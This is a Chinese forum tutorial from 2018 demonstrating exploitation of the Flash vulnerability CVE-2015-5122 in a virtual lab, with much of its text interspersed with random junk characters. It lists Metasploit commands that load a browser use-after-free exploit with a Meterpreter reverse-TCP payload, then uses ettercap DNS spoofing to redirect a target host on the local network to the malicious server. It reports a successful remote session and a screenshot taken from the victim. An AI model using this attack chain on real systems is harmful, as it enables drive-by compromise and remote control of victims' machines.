cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

+ h" J9 {5 N7 G" ~* ^& X 二、cve2015-5122漏洞实例演示虚拟机 & s/ ^" ~; h5 l' h8 w6 @; _

$ d+ w) G2 ~; @$ l 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： & |, H! R, j4 v( C/ ^% \ ^- D

4 ]( E( V* E1 D1 e search cve-2015-5122如图： ) Q; b, |5 y8 c

' h$ l/ A3 f3 o7 M9 z L 8 Q, D. v, J6 f( J- o6 F0 P9 _

# I) Y w% q! A3 Q W5 ? 下面我们敲如下命令： 5 v2 x! y: r0 ]- x% Z

3 f! {, H* m7 o0 R6 t- r use exploit/multi/browser/adobe_flash_opaque_background_uaf 8 L8 E! J, q4 L

3 }) _* F( Y" i, f V4 ? set PAYLOAD windows/meterpreter/reverse_tcp ( x m( C3 e4 Q9 V

8 }" O- t# t3 ^# \ set LHOST 192.168.0.109 1 ]5 [9 M& R- I8 O

" [/ t1 G% R( @- [1 N set URIPATH / /*根目录*/ 1 u" i1 c) g! j

, J: V1 N; U' M: F9 B set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 % F6 d0 E5 k5 x- k" i

$ h( `- U4 q1 e/ _0 `/ w/ Q set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 / F" R% r6 V( ]! X2 n( F: R& Y

. P1 _1 O( s# S! C- V( ^8 ~) @ 然后show options如图： # W0 t" v+ x9 Y

1 e, }* \- B( u* g# n : b3 n3 M7 t+ d: d! O

. S. N. I5 W+ C: b' R( D 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
5 a& b! e* p2 r/ h% \! Z 8 O! J/ Y* q) l% e$ @

" T! c- F3 F9 a, m" ] 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 / Q, E1 m% w L; \+ v/ Z2 {6 R- L# d

5 C4 N$ d/ a5 a7 L: S- _ Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf % a/ i3 z, R* R% }: `1 c' _

( K I' O+ i/ d # b: x" N# D% X9 j& n. c# }

* v+ f) `. F$ H8 g: ^6 Z 成功了，这时候我们断开ettercap，如图： 0 K/ ~* x( h* i$ n5 `; p& |9 }6 a

0 h9 Z' }8 ^) g3 p9 J1 M7 z* [ 7 _; B1 k1 y, D3 l3 J$ a: K

4 |: p- v& Y% w# K8 ? Screenshot如图： & D# |; p) z1 X# { w6 S

+ B- o' Y2 j& g! C! q8 } # @( h$ E1 N: ~/ Z

4 a, |9 d% _: D# U+ J" y7 V9 o+ M! @ 1 e1 k1 C* y# B0 s7 b

		自动登录	找回密码
密码			立即注册

cve2015-5122漏洞实例演示虚拟机

浏览过的版块